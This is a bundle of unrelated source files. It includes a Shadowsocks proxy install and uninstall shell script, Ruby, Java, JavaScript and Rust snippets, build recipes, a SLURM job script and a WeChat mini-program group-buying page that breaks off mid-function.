exit 1
fi
}
install_shadowsocks_libev(){
cd "${cur_dir}" || exit
tar zxf "${shadowsocks_libev_file}".tar.gz
cd "${shadowsocks_libev_file}" || exit
./configure --disable-documentation && make && make install
if [ $? -eq 0 ]; then
chmod +x ${shadowsocks_libev_init}
local service_name
service_name=$(basename ${shadowsocks_libev_init})
if check_sys packageManager yum; then
chkconfig --add "${service_name}"
chkconfig "${service_name}" on
elif check_sys packageManager apt; then
update-rc.d -f "${service_name}" defaults
fi
else
echo
echo -e "[${red}Error${plain}] ${software[3]} install failed."
echo 'Please visit: https://teddysun.com/486.html and contact.'
install_cleanup
exit 1
fi
}
install_shadowsocks_libev_obfs(){
if [ "${libev_obfs}" == 'y' ] || [ "${libev_obfs}" == 'Y' ]; then
cd "${cur_dir}" || exit
git clone https://github.com/shadowsocks/simple-obfs.git
[ -d simple-obfs ] && cd simple-obfs || echo -e "[${red}Error:${plain}] Failed to git clone simple-obfs."
git submodule update --init --recursive
if centosversion 6; then
if [ ! "$(command -v autoconf268)" ]; then
echo -e "[${green}Info${plain}] Starting install autoconf268..."
yum install -y autoconf268 > /dev/null 2>&1 || echo -e "[${red}Error:${plain}] Failed to install autoconf268."
fi
# replace command autoreconf to autoreconf268
sed -i 's/autoreconf/autoreconf268/' autogen.sh
# replace #include <ev.h> to #include <libev/ev.h>
sed -i 's@^#include <ev.h>@#include <libev/ev.h>@' src/local.h
sed -i 's@^#include <ev.h>@#include <libev/ev.h>@' src/server.h
fi
./autogen.sh
./configure --disable-documentation
make
make install
if [ ! "$(command -v obfs-server)" ]; then
echo -e "[${red}Error${plain}] simple-obfs for ${software[${selected}-1]} install failed."
echo 'Please visit: https://teddysun.com/486.html and contact.'
install_cleanup
exit 1
fi
[ -f /usr/local/bin/obfs-server ] && ln -s /usr/local/bin/obfs-server /usr/bin
fi
}
install_completed_python(){
clear
${shadowsocks_python_init} start
echo
echo -e "Congratulations, ${green}${software[0]}${plain} server install completed!"
echo -e "Your Server IP : ${red} $(get_ip) ${plain}"
echo -e "Your Server Port : ${red} ${shadowsocksport} ${plain}"
echo -e "Your Password : ${red} ${shadowsockspwd} ${plain}"
echo -e "Your Encryption Method: ${red} ${shadowsockscipher} ${plain}"
}
install_completed_r(){
clear
${shadowsocks_r_init} start
echo
echo -e "Congratulations, ${green}${software[1]}${plain} server install completed!"
echo -e "Your Server IP : ${red} $(get_ip) ${plain}"
echo -e "Your Server Port : ${red} ${shadowsocksport} ${plain}"
echo -e "Your Password : ${red} ${shadowsockspwd} ${plain}"
echo -e "Your Protocol : ${red} ${shadowsockprotocol} ${plain}"
echo -e "Your obfs : ${red} ${shadowsockobfs} ${plain}"
echo -e "Your Encryption Method: ${red} ${shadowsockscipher} ${plain}"
}
install_completed_go(){
clear
${shadowsocks_go_init} start
echo
echo -e "Congratulations, ${green}${software[2]}${plain} server install completed!"
echo -e "Your Server IP : ${red} $(get_ip) ${plain}"
echo -e "Your Server Port : ${red} ${shadowsocksport} ${plain}"
echo -e "Your Password : ${red} ${shadowsockspwd} ${plain}"
echo -e "Your Encryption Method: ${red} ${shadowsockscipher} ${plain}"
}
install_completed_libev(){
clear
ldconfig
${shadowsocks_libev_init} start
echo
echo -e "Congratulations, ${green}${software[3]}${plain} server install completed!"
echo -e "Your Server IP : ${red} $(get_ip) ${plain}"
echo -e "Your Server Port : ${red} ${shadowsocksport} ${plain}"
echo -e "Your Password : ${red} ${shadowsockspwd} ${plain}"
if [ "$(command -v obfs-server)" ]; then
echo -e "Your obfs : ${red} ${shadowsocklibev_obfs} ${plain}"
fi
echo -e "Your Encryption Method: ${red} ${shadowsockscipher} ${plain}"
}
qr_generate_python(){
if [ "$(command -v qrencode)" ]; then
local tmp
tmp=$(echo -n "${shadowsockscipher}:${shadowsockspwd}@$(get_ip):${shadowsocksport}" | base64 -w0)
local qr_code="ss://${tmp}"
echo
echo 'Your QR Code: (For Shadowsocks Windows, OSX, Android and iOS clients)'
echo -e "${green} ${qr_code} ${plain}"
echo -n "${qr_code}" | qrencode -s8 -o "${cur_dir}"/shadowsocks_python_qr.png
echo 'Your QR Code has been saved as a PNG file path:'
echo -e "${green} ${cur_dir}/shadowsocks_python_qr.png ${plain}"
fi
}
qr_generate_r(){
if [ "$(command -v qrencode)" ]; then
local tmp1
tmp1=$(echo -n "${shadowsockspwd}" | base64 -w0 | sed 's/=//g;s/\//_/g;s/+/-/g')
local tmp2
tmp2=$(echo -n "$(get_ip):${shadowsocksport}:${shadowsockprotocol}:${shadowsockscipher}:${shadowsockobfs}:${tmp1}/?obfsparam=" | base64 -w0)
local qr_code="ssr://${tmp2}"
echo
echo 'Your QR Code: (For ShadowsocksR Windows, Android clients only)'
echo -e "${green} ${qr_code} ${plain}"
echo -n "${qr_code}" | qrencode -s8 -o "${cur_dir}"/shadowsocks_r_qr.png
echo 'Your QR Code has been saved as a PNG file path:'
echo -e "${green} ${cur_dir}/shadowsocks_r_qr.png ${plain}"
fi
}
qr_generate_go(){
if [ "$(command -v qrencode)" ]; then
local tmp
tmp=$(echo -n "${shadowsockscipher}:${shadowsockspwd}@$(get_ip):${shadowsocksport}" | base64 -w0)
local qr_code="ss://${tmp}"
echo
echo 'Your QR Code: (For Shadowsocks Windows, OSX, Android and iOS clients)'
echo -e "${green} ${qr_code} ${plain}"
echo -n "${qr_code}" | qrencode -s8 -o "${cur_dir}"/shadowsocks_go_qr.png
echo 'Your QR Code has been saved as a PNG file path:'
echo -e "${green} ${cur_dir}/shadowsocks_go_qr.png ${plain}"
fi
}
qr_generate_libev(){
if [ "$(command -v qrencode)" ]; then
local tmp
tmp=$(echo -n "${shadowsockscipher}:${shadowsockspwd}@$(get_ip):${shadowsocksport}" | base64 -w0)
local qr_code="ss://${tmp}"
echo
echo 'Your QR Code: (For Shadowsocks Windows, OSX, Android and iOS clients)'
echo -e "${green} ${qr_code} ${plain}"
echo -n "${qr_code}" | qrencode -s8 -o "${cur_dir}"/shadowsocks_libev_qr.png
echo 'Your QR Code has been saved as a PNG file path:'
echo -e "${green} ${cur_dir}/shadowsocks_libev_qr.png ${plain}"
fi
}
install_main(){
install_libsodium
if ! ldconfig -p | grep -wq '/usr/lib'; then
echo '/usr/lib' > /etc/ld.so.conf.d/lib.conf
fi
ldconfig
if [ "${selected}" == '1' ]; then
install_shadowsocks_python
install_completed_python
qr_generate_python
elif [ "${selected}" == '2' ]; then
install_shadowsocks_r
install_completed_r
qr_generate_r
elif [ "${selected}" == '3' ]; then
install_shadowsocks_go
install_completed_go
qr_generate_go
elif [ "${selected}" == '4' ]; then
install_mbedtls
install_shadowsocks_libev
install_shadowsocks_libev_obfs
install_completed_libev
qr_generate_libev
fi
echo
echo 'Welcome to visit: https://teddysun.com/486.html'
echo 'Enjoy it!'
echo
}
install_cleanup(){
cd "${cur_dir}" || exit
rm -rf simple-obfs
rm -rf ${libsodium_file} ${libsodium_file}.tar.gz
rm -rf "${mbedtls_file}" "${mbedtls_file}"-apache.tgz
rm -rf ${shadowsocks_python_file} ${shadowsocks_python_file}.zip
rm -rf ${shadowsocks_r_file} ${shadowsocks_r_file}.tar.gz
rm -rf ${shadowsocks_go_file_64}.gz ${shadowsocks_go_file_32}.gz
rm -rf "${shadowsocks_libev_file}" "${shadowsocks_libev_file}".tar.gz
}
install_shadowsocks(){
disable_selinux
install_select
install_prepare
install_dependencies
download_files
config_shadowsocks
if check_sys packageManager yum; then
config_firewall
fi
install_main
install_cleanup
}
uninstall_shadowsocks_python(){
printf "Are you sure uninstall ${red}${software[0]}${plain}? [y/n]\n"
read -p '(default: n):' answer
[ -z "${answer}" ] && answer='n'
if [ "${answer}" == 'y' ] || [ "${answer}" == 'Y' ]; then
${shadowsocks_python_init} status > /dev/null 2>&1
if [ $? -eq 0 ]; then
${shadowsocks_python_init} stop
fi
local service_name
service_name=$(basename ${shadowsocks_python_init})
if check_sys packageManager yum; then
chkconfig --del "${service_name}"
elif check_sys packageManager apt; then
update-rc.d -f "${service_name}" remove
fi
rm -fr $(dirname ${shadowsocks_python_config})
rm -f ${shadowsocks_python_init}
rm -f /var/log/shadowsocks.log
if [ -f /usr/local/shadowsocks_python.log ]; then
cat /usr/local/shadowsocks_python.log | xargs rm -rf
rm -f /usr/local/shadowsocks_python.log
fi
echo -e "[${green}Info${plain}] ${software[0]} uninstall success"
else
echo
echo -e "[${green}Info${plain}] ${software[0]} uninstall cancelled, nothing to do..."
echo
fi
}
uninstall_shadowsocks_r(){
printf "Are you sure uninstall ${red}${software[1]}${plain}? [y/n]\n"
read -p '(default: n):' answer
[ -z "${answer}" ] && answer='n'
if [ "${answer}" == 'y' ] || [ "${answer}" == 'Y' ]; then
${shadowsocks_r_init} status > /dev/null 2>&1
if [ $? -eq 0 ]; then
${shadowsocks_r_init} stop
fi
local service_name
service_name=$(basename ${shadowsocks_r_init})
if check_sys packageManager yum; then
chkconfig --del "${service_name}"
elif check_sys packageManager apt; then
update-rc.d -f "${service_name}" remove
fi
rm -fr $(dirname ${shadowsocks_r_config})
rm -f ${shadowsocks_r_init}
rm -f /var/log/shadowsocks.log
rm -fr /usr/local/shadowsocks
echo -e "[${green}Info${plain}] ${software[1]} uninstall success"
else
echo
echo -e "[${green}Info${plain}] ${software[1]} uninstall cancelled, nothing to do..."
echo
fi
}
uninstall_shadowsocks_go(){
printf "Are you sure uninstall ${red}${software[2]}${plain}? [y/n]\n"
read -p '(default: n):' answer
[ -z "${answer}" ] && answer='n'
if [ "${answer}" == 'y' ] || [ "${answer}" == 'Y' ]; then
${shadowsocks_go_init} status > /dev/null 2>&1
if [ $? -eq 0 ]; then
${shadowsocks_go_init} stop
fi
local service_name
service_name=$(basename ${shadowsocks_go_init})
if check_sys packageManager yum; then
chkconfig --del "${service_name}"
elif check_sys packageManager apt; then
update-rc.d -f "${service_name}" remove
fi
rm -fr $(dirname ${shadowsocks_go_config})
rm -f ${shadowsocks_go_init}
rm -f /usr/bin/shadowsocks-server
echo -e "[${green}Info${plain}] ${software[2]} uninstall success"
else
echo
echo -e "[${green}Info${plain}] ${software[2]} uninstall cancelled, nothing to do..."
echo
fi
}
uninstall_shadowsocks_libev(){
printf "Are you sure uninstall ${red}${software[3]}${plain}? [y/n]\n"
read -p '(default: n):' answer
[ -z "${answer}" ] && answer='n'
if [ "${answer}" == 'y' ] || [ "${answer}" == 'Y' ]; then
${shadowsocks_libev_init} status > /dev/null 2>&1
if [ $? -eq 0 ]; then
${shadowsocks_libev_init} stop
fi
local service_name
service_name=$(basename ${shadowsocks_libev_init})
if check_sys packageManager yum; then
chkconfig --del "${service_name}"
elif check_sys packageManager apt; then
update-rc.d -f "${service_name}" remove
fi
rm -fr $(dirname ${shadowsocks_libev_config})
rm -f /usr/local/bin/ss-local
rm -f /usr/local/bin/ss-tunnel
rm -f /usr/local/bin/ss-server
rm -f /usr/local/bin/ss-manager
rm -f /usr/local/bin/ss-redir
rm -f /usr/local/bin/ss-nat
rm -f /usr/local/bin/obfs-local
rm -f /usr/local/bin/obfs-server
rm -f /usr/local/lib/libshadowsocks-libev.a
rm -f /usr/local/lib/libshadowsocks-libev.la
rm -f /usr/local/include/shadowsocks.h
rm -f /usr/local/lib/pkgconfig/shadowsocks-libev.pc
rm -f /usr/local/share/man/man1/ss-local.1
rm -f /usr/local/share/man/man1/ss-tunnel.1
rm -f /usr/local/share/man/man1/ss-server.1
rm -f /usr/local/share/man/man1/ss-manager.1
rm -f /usr/local/share/man/man1/ss-redir.1
rm -f /usr/local/share/man/man1/ss-nat.1
rm -f /usr/local/share/man/man8/shadowsocks-libev.8
rm -fr /usr/local/share/doc/shadowsocks-libev
rm -f ${shadowsocks_libev_init}
echo -e "[${green}Info${plain}] ${software[3]} uninstall success"
else
echo
echo -e "[${green}Info${plain}] ${software[3]} uninstall cancelled, nothing to do..."
echo
fi
}
uninstall_shadowsocks(){
while true
do
echo 'Which Shadowsocks server you want to uninstall?'
for ((i=1;i<=${#software[@]};i++ )); do
hint="${software[$i-1]}"
echo -e "${green}${i}${plain}) ${hint}"
done
read -p 'Please enter a number [1-4]:' un_select
case "${un_select}" in
1|2|3|4)
echo
echo "You choose = ${software[${un_select}-1]}"
echo
break
;;
*)
echo -e "[${red}Error${plain}] Please only enter a number [1-4]"
;;
esac
done
if [ "${un_select}" == '1' ]; then
if [ -f ${shadowsocks_python_init} ]; then
uninstall_shadowsocks_python
else
echo -e "[${red}Error${plain}] ${software[${un_select}-1]} not installed, please check it and try again."
echo
exit 1
fi
elif [ "${un_select}" == '2' ]; then
if [ -f ${shadowsocks_r_init} ]; then
uninstall_shadowsocks_r
else
echo -e "[${red}Error${plain}] ${software[${un_select}-1]} not installed, please check it and try again."
echo
exit 1
fi
elif [ "${un_select}" == '3' ]; then
if [ -f ${shadowsocks_go_init} ]; then
uninstall_shadowsocks_go
else
echo -e "[${red}Error${plain}] ${software[${un_select}-1]} not installed, please check it and try again."
echo
exit 1
fi
elif [ "${un_select}" == '4' ]; then
if [ -f ${shadowsocks_libev_init} ]; then
uninstall_shadowsocks_libev
else
echo -e "[${red}Error${plain}] ${software[${un_select}-1]} not installed, please check it and try again."
echo
exit 1
fi
fi
}
# Initialization step
action=$1
[ -z "$1" ] && action=install
case "${action}" in
install|uninstall)
${action}_shadowsocks
;;
*)
echo "Arguments error! [${action}]"
echo "Usage: $(basename "$0") [install|uninstall]"
;;
esac |
<gh_stars>0
module ProviderInterface
class ApplicationStatusTagComponent < ViewComponent::Base
delegate :status, to: :application_choice
def initialize(application_choice:)
@application_choice = application_choice
end
def text
I18n.t!("provider_application_states.#{status}")
end
def type
case status
when 'unsubmitted', 'cancelled', 'application_not_sent'
# will never be visible to the provider
when 'awaiting_provider_decision'
:purple
when 'interviewing'
:yellow
when 'offer'
:turquoise
when 'pending_conditions'
:blue
when 'recruited'
:green
when 'rejected', 'conditions_not_met', 'offer_withdrawn'
:orange
when 'declined', 'withdrawn'
:red
when 'offer_deferred'
:yellow
else
raise "You need to define a colour for the #{status} state"
end
end
private
attr_reader :application_choice
end
end
|
<reponame>zonesgame/StendhalArcClient<gh_stars>1-10
/***************************************************************************
* (C) Copyright 2003-2016 - Marauroa *
***************************************************************************
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
package marauroa.common.net.message;
import java.io.IOException;
import marauroa.common.net.Channel;
import marauroa.common.net.InputSerializer;
/**
* This message indicate the client that the server has rejected its Logout
* Message
*
* @see marauroa.common.net.message.Message
*/
public class MessageS2CLogoutNACK extends Message {
/** Constructor for allowing creation of an empty message */
public MessageS2CLogoutNACK() {
super(MessageType.S2C_LOGOUT_NACK, null);
}
/**
* Constructor with a TCP/IP source/destination of the message
*
* @param source
* The TCP/IP address associated to this message
*/
public MessageS2CLogoutNACK(Channel source) {
super(MessageType.S2C_LOGOUT_NACK, source);
}
/**
* This method returns a String that represent the object
*
* @return a string representing the object.
*/
@Override
public String toString() {
return "Message (S2C Logout NACK) from (" + getAddress() + ") CONTENTS: ()";
}
@Override
public void readObject(InputSerializer in) throws IOException {
super.readObject(in);
if (type != MessageType.S2C_LOGOUT_NACK) {
throw new IOException();
}
}
}
|
#ifndef IBOutlet
#define IBOutlet
#endif
#ifndef IBAction
#define IBAction void
#endif
|
<filename>public/plugins/reportbro/src/commands/SetValueCmd.js
import Command from './Command';
import DocElement from '../elements/DocElement';
/**
* Command to set a single value of a data object.
* @class
*/
export default class SetValueCmd {
constructor(objId, tagId, field, value, type, rb) {
this.objId = objId;
this.tagId = tagId;
this.field = field;
this.value = value;
this.type = type;
this.rb = rb;
let obj = rb.getDataObject(objId);
this.oldValue = obj.getValue(field);
this.firstExecution = true;
this.select = true;
}
getName() {
return 'Set value';
}
do() {
if (!this.firstExecution && this.select) {
this.rb.selectObject(this.objId, true);
}
this.setValue(this.value);
this.firstExecution = false;
}
undo() {
if (this.select) {
this.rb.selectObject(this.objId, true);
}
this.setValue(this.oldValue);
}
setValue(value) {
let obj = this.rb.getDataObject(this.objId);
let detailData = this.rb.getDetailData();
let isShown = (detailData !== null && detailData.getId() === this.objId);
let elSelector = `#${this.tagId}`;
obj.setValue(this.field, value, elSelector, isShown);
if (obj instanceof DocElement) {
value = obj.getUpdateValue(this.field, value);
}
if (this.field === 'name') {
$(`#rbro_menu_item_name${this.objId}`).text(value);
$(`#rbro_menu_item_name${this.objId}`).attr('title', value);
this.rb.notifyEvent(obj, Command.operation.rename);
} else {
this.rb.notifyEvent(obj, Command.operation.change, this.field);
}
if (isShown) {
if (this.type === SetValueCmd.type.text || this.type === SetValueCmd.type.select) {
$(elSelector).val(value);
} else if (this.type === SetValueCmd.type.filename) {
$(elSelector).text(value);
if (value === '') {
$(`#${this.tagId}_container`).addClass('rbroHidden');
} else {
$(`#${this.tagId}_container`).removeClass('rbroHidden');
}
} else if (this.type === SetValueCmd.type.checkbox) {
$(elSelector).prop('checked', value);
} else if (this.type === SetValueCmd.type.button) {
if (value) {
$(elSelector).addClass('rbroButtonActive');
} else {
$(elSelector).removeClass('rbroButtonActive');
}
} else if (this.type === SetValueCmd.type.buttonGroup) {
$(elSelector).find('button').removeClass('rbroButtonActive');
$(elSelector).find(`button[value="${value}"]`).addClass('rbroButtonActive');
} else if (this.type === SetValueCmd.type.color) {
$(elSelector).spectrum("set", value);
}
}
}
/**
* Disables selection of the element containing the changed field. By default an element is automatically
* selected after one of its fields was changed.
*/
disableSelect() {
this.select = false;
}
/**
* Returns true if the given command targets the same field. This information can be useful to avoid separate
* commands for every keystroke in a text field and generate just one command for the whole changed text instead.
* @param {SetValueCmd} newCmd
* @returns {boolean}
*/
allowReplace(newCmd) {
return (this.type === SetValueCmd.type.text && this.objId === newCmd.objId &&
this.tagId === newCmd.tagId && this.field === newCmd.field);
}
}
SetValueCmd.type = {
text: 'text',
select: 'select',
file: 'file',
filename: 'filename',
checkbox: 'checkbox',
button: 'button',
buttonGroup: 'buttonGroup', // one button inside a group of buttons with only one active button
color: 'color',
internal: 'internal'
};
|
1. Design a REST API endpoint to generate a personalized greeting message.
2. Take the user name as an input parameter.
3. Construct an algorithm to generate the greeting message.
4. Format the output with appropriate grammatical rules and punctuation.
5. Validate the input and output types of the API. |
#!/bin/sh
set -e
if tmux has-session -t blog 2> /dev/null; then
tmux attach -t blog
exit
fi
tmux new-session -d -s blog -n editor
tmux send-keys -t blog:editor "v " Enter
tmux split-window -t blog:editor -h -p 10
tmux attach -t blog:editor.top
|
TERMUX_PKG_HOMEPAGE=https://www.dovecot.org
TERMUX_PKG_DESCRIPTION="Secure IMAP and POP3 email server"
TERMUX_PKG_VERSION=2.2.31
TERMUX_PKG_SRCURL=https://www.dovecot.org/releases/2.2/dovecot-$TERMUX_PKG_VERSION.tar.gz
TERMUX_PKG_SHA256=034be40907748128d65088a4f59789b2f99ae7b33a88974eae0b6a68ece376a1
TERMUX_PKG_MAINTAINER="Vishal Biswas @vishalbiswas"
TERMUX_PKG_DEPENDS="openssl, libcrypt"
# turning on icu gives undefined reference to __cxa_call_unexpected
TERMUX_PKG_EXTRA_CONFIGURE_ARGS="
--with-zlib
--with-ssl=openssl
--with-ssldir=$TERMUX_PREFIX/etc/tls
--without-icu
--without-shadow
i_cv_epoll_works=yes
i_cv_posix_fallocate_works=yes
i_cv_signed_size_t=no
i_cv_gmtime_max_time_t=40
i_cv_signed_time_t=yes
i_cv_mmap_plays_with_write=yes
i_cv_fd_passing=yes
i_cv_c99_vsnprintf=yes
lib_cv_va_copy=yes
lib_cv___va_copy=yes
"
termux_step_pre_configure () {
LDFLAGS="$LDFLAGS -llog"
for i in `find $TERMUX_PKG_SRCDIR/src/director -type f`; do sed 's|\bstruct user\b|struct usertest|g' -i $i; done
if [ "$TERMUX_ARCH" == "aarch64" ]; then
TERMUX_PKG_EXTRA_CONFIGURE_ARGS+="lib_cv_va_val_copy=yes"
else
TERMUX_PKG_EXTRA_CONFIGURE_ARGS+="lib_cv_va_val_copy=no"
fi
}
termux_step_post_make_install () {
for binary in doveadm doveconf; do
mv $TERMUX_PREFIX/bin/$binary $TERMUX_PREFIX/libexec/dovecot/$binary
cat > $TERMUX_PREFIX/bin/$binary <<HERE
#!$TERMUX_PREFIX/bin/sh
export LD_LIBRARY_PATH=$TERMUX_PREFIX/lib/dovecot:\$LD_LIBRARY_PATH
exec $TERMUX_PREFIX/libexec/dovecot/$binary $@
HERE
chmod u+x $TERMUX_PREFIX/bin/$binary
done
}
|
package com.vmware.spring.workshop.facade.support.impl;
import java.beans.IntrospectionException;
import org.springframework.stereotype.Component;
import com.vmware.spring.workshop.dto.user.UserDTO;
import com.vmware.spring.workshop.facade.support.UserDTOImportExport;
/**
* @author lgoldstein
*/
@Component("userDTOImportExport")
public class UserDTOImportExportImpl
extends AbstractCSVImportExportImpl<UserDTO>
implements UserDTOImportExport {
public UserDTOImportExportImpl () throws IntrospectionException {
super(UserDTO.class);
}
}
|
export { default } from "./AddPetPage";
|
#!/bin/bash
#SBATCH -J vis -p development -N 1 --ntasks-per-node 56 -t 2:00:00 -A AST21002
source $HOME/.bashrc
python ~/scripts/CrunchSnaps/scripts/make_movie_from_camerafile.py camerafile.txt ../../M2e4_R10_S0_T1_B0.01_Res271_n2_sol0.5_42/output --np=14 --np_render=4 --res=1920 --no_timestamp --fresco_stars
|
<gh_stars>1-10
module GoalsHelper
def goal_text(goal)
"I'll #{goal.message} #{number_with_delimiter(goal.number)} #{goal.message2} in 2009. Currently #{goal.current}"
end
end
|
#!/bin/bash
rustc --emit mir -Z mir-opt-level=3 - <<EOF
// build-pass
#![allow(dead_code)]
trait Foo {
fn foo(&self);
}
fn foo<'a>(s: &'a mut ()) where &'a mut (): Foo {
s.foo();
}
fn main() {}
EOF
|
const base = '../api/sentinl';
export default {
WATCHER_EDIT: {
COUNT: `${base}/watcher/editor/count`,
AVERAGE: `${base}/watcher/editor/average`,
SUM: `${base}/watcher/editor/sum`,
MIN: `${base}/watcher/editor/min`,
MAX: `${base}/watcher/editor/max`,
},
ES: {
ALL_INDEXES: `${base}/es/indexes`,
GET_MAPPING: `${base}/es/getmapping`,
},
};
|
var _Page;
function _defineProperty(t, e, o) {
return e in t ? Object.defineProperty(t, e, {
value: o,
enumerable: !0,
configurable: !0,
writable: !0
}) : t[e] = o, t;
}
var utils = require("../../../utils/helper.js");
Page((_defineProperty(_Page = {
data: {
groupFail: 0,
show_attr_picker: !1,
form: {
number: 1
}
},
onLoad: function(t) {
getApp().page.onLoad(this, t);
var e = t.user_id, o = decodeURIComponent(t.scene);
if (void 0 !== e) e; else if (void 0 !== o) {
var a = utils.scene_decode(o);
a.uid && a.oid ? (a.uid, t.oid = a.oid) : o;
} else if ("undefined" != typeof my && null !== getApp().query) {
var i = getApp().query;
getApp().query = null, t.oid = i.oid, i.uid;
}
this.setData({
oid: t.oid
}), this.getInfo(t);
},
onReady: function() {},
onShow: function() {},
onHide: function() {},
onUnload: function() {},
onPullDownRefresh: function() {},
onReachBottom: function() {},
onShareAppMessage: function(t) {
getApp().page.onShareAppMessage(this);
var e = this, o = getApp().core.getStorageSync(getApp().const.USER_INFO), a = "/pages/pt/group/details?oid=" + e.data.oid + "&user_id=" + o.id;
return {
title: "快来" + e.data.goods.price + "元拼 " + e.data.goods.name,
path: a,
success: function(t) {}
};
},
getInfo: function(t) {
var e = t.oid, o = this;
getApp().core.showLoading({
title: "正在加载",
mask: !0
}), getApp().request({
url: getApp().api.group.group_info,
method: "get",
data: {
oid: e
},
success: function(t) {
if (0 == t.code) {
0 == t.data.groupFail && o.countDownRun(t.data.limit_time_ms);
var e = (t.data.goods.original_price - t.data.goods.price).toFixed(2);
o.setData({
goods: t.data.goods,
groupList: t.data.groupList,
surplus: t.data.surplus,
limit_time_ms: t.data.limit_time_ms,
goods_list: t.data.goodsList,
group_fail: t.data.groupFail,
oid: t.data.oid,
in_group: t.data.inGroup,
attr_group_list: t.data.attr_group_list,
group_rule_id: t.data.groupRuleId,
reduce_price: e < 0 ? 0 : e,
group_id: t.data.goods.class_group
}), 0 != t.data.groupFail && t.data.inGroup && o.setData({
oid: !1,
group_id: !1
}), o.selectDefaultAttr();
} else getApp().core.showModal({
title: "提示",
content: t.msg,
showCancel: !1,
success: function(t) {
t.confirm && getApp().core.redirectTo({
url: "/pages/pt/index/index"
});
}
});
},
complete: function(t) {
setTimeout(function() {
getApp().core.hideLoading();
}, 1e3);
}
});
},
selectDefaultAttr: function() {
var t = this;
if (!t.data.goods || 0 === t.data.goods.use_attr) for (var e in t.data.attr_group_list) for (var o in t.data.attr_group_list[e].attr_list) 0 == e && 0 == o && (t.data.attr_group_list[e].attr_list[o].checked = !0);
t.setData({
attr_group_list: t.data.attr_group_list
});
},
countDownRun: function(r) {
var s = this;
setInterval(function() {
var t = new Date(r[0], r[1] - 1, r[2], r[3], r[4], r[5]) - new Date(), e = parseInt(t / 1e3 / 60 / 60 / 24, 10), o = parseInt(t / 1e3 / 60 / 60 % 24, 10), a = parseInt(t / 1e3 / 60 % 60, 10), i = parseInt(t / 1e3 % 60, 10);
e = s.checkTime(e), o = s.checkTime(o), a = s.checkTime(a), i = s.checkTime(i),
s.setData({
limit_time: {
days: e,
hours: o,
mins: a,
secs: i
}
});
}, 1e3);
},
checkTime: function(t) {
return (t = 0 < t ? t : 0) < 10 && (t = "0" + t), t;
},
goToHome: function() {
getApp().core.redirectTo({
url: "/pages/pt/index/index"
});
},
goToGoodsDetails: function(t) {
getApp().core.redirectTo({
url: "/pages/pt/details/details?gid=" + this.data.goods.id
});
},
hideAttrPicker: function() {
this.setData({
show_attr_picker: !1
});
},
showAttrPicker: function() {
this.setData({
show_attr_picker: !0
});
},
attrClick: function(t) {
var o = this, e = t.target.dataset.groupId, a = t.target.dataset.id, i = o.data.attr_group_list;
for (var r in i) if (i[r].attr_group_id == e) for (var s in i[r].attr_list) i[r].attr_list[s].attr_id == a ? i[r].attr_list[s].checked = !0 : i[r].attr_list[s].checked = !1;
o.setData({
attr_group_list: i
});
var d = [], n = !0;
for (var r in i) {
var c = !1;
for (var s in i[r].attr_list) if (i[r].attr_list[s].checked) {
d.push(i[r].attr_list[s].attr_id), c = !0;
break;
}
if (!c) {
n = !1;
break;
}
}
n && (getApp().core.showLoading({
title: "正在加载",
mask: !0
}), getApp().request({
url: getApp().api.group.goods_attr_info,
data: {
goods_id: o.data.goods.id,
group_id: o.data.goods.class_group,
attr_list: JSON.stringify(d)
},
success: function(t) {
if (getApp().core.hideLoading(), 0 == t.code) {
var e = o.data.goods;
e.price = t.data.price, e.num = t.data.num, e.attr_pic = t.data.pic, o.setData({
goods: e
});
}
}
}));
},
buyNow: function() {
this.submit("GROUP_BUY_C");
},
submit: function(t) {
var e = this;
if (!e.data.show_attr_picker) return e.setData({
show_attr_picker: !0
}), !0;
if (e.data.form.number > e.data.goods.num) return getApp().core.showToast({
title: "商品库存不足,请选择其它规格或数量",
image: "/images/icon-warning.png"
}), !0;
var o = e.data.attr_group_list, a = [];
for (var i in o) {
var r = !1;
for (var s in o[i].attr_list) if (o[i].attr_list[s].checked) {
r = {
attr_id: o[i].attr_list[s].attr_id,
attr_name: o[i].attr_list[s].attr_name
};
break;
}
if (!r) return getApp().core.showToast({
title: "请选择" + o[i].attr_group_name,
image: "/images/icon-warning.png"
}), !0;
a.push({
attr_group_id: o[i].attr_group_id,
attr_group_name: o[i].attr_group_name,
attr_id: r.attr_id,
attr_name: r.attr_name
});
}
e.setData({
show_attr_picker: !1
}), getApp().core.redirectTo({
url: "/pages/pt/order-submit/order-submit?goods_info=" + JSON.stringify({
goods_id: e.data.goods.id,
attr: a,
num: e.data.form.number,
type: t,
parent_id: e.data.oid,
deliver_type: e.data.goods.type,
group_id: e.data.goods.class_group
})
});
},
numberSub: function() {
var t = this.data.form.number;
if (t <= 1) return !0;
t--, this.setData({
form: {
number: t
}
});
},
numberAdd: function() {
var t = this, e = t.data.form.number;
++e > t.data.goods.one_buy_limit && 0 != t.data.goods.one_buy_limit ? getApp().core.showModal({
title: "提示",
content: "最多只允许购买" + t.data.goods.one_buy_limit,
showCancel: !1
}) : t.setData({
form: {
number: e
}
});
},
numberBlur: function(t) {
var e = this, o = t.detail.value;
if (o = parseInt(o), isNaN(o) && (o = 1), o <= 0 && (o = 1), o > e.data.goods.one_buy_limit && 0 != e.data.goods.one_buy_limit) return getApp().core.showModal({
title: "提示",
content: "最多只允许购买" + e.data.goods.one_buy_limit + "件",
showCancel: !1
}), void e.setData({
form: {
number: o
}
});
e.setData({
form: {
number: o
}
});
},
goArticle: function(t) {
this.data.group_rule_id && getApp().core.navigateTo({
url: "/pages/article-detail/article-detail?id=" + this.data.group_rule_id
});
},
showShareModal: function(t) {
this.setData({
share_modal_active: "active",
no_scroll: !0
});
},
shareModalClose: function() {
this.setData({
share_modal_active: "",
no_scroll: !1
});
},
getGoodsQrcode: function() {
var e = this;
if (e.setData({
goods_qrcode_active: "active",
share_modal_active: ""
}), e.data.goods_qrcode) return !0;
getApp().request({
url: getApp().api.group.order.goods_qrcode,
data: {
order_id: e.data.oid
},
success: function(t) {
0 == t.code && e.setData({
goods_qrcode: t.data.pic_url
}), 1 == t.code && (e.goodsQrcodeClose(), getApp().core.showModal({
title: "提示",
content: t.msg,
showCancel: !1,
success: function(t) {
t.confirm;
}
}));
}
});
},
goodsQrcodeClose: function() {
this.setData({
goods_qrcode_active: "",
no_scroll: !1
});
}
}, "goodsQrcodeClose", function() {
this.setData({
goods_qrcode_active: "",
no_scroll: !1
});
}), _defineProperty(_Page, "saveGoodsQrcode", function() {
var e = this;
getApp().core.saveImageToPhotosAlbum ? (getApp().core.showLoading({
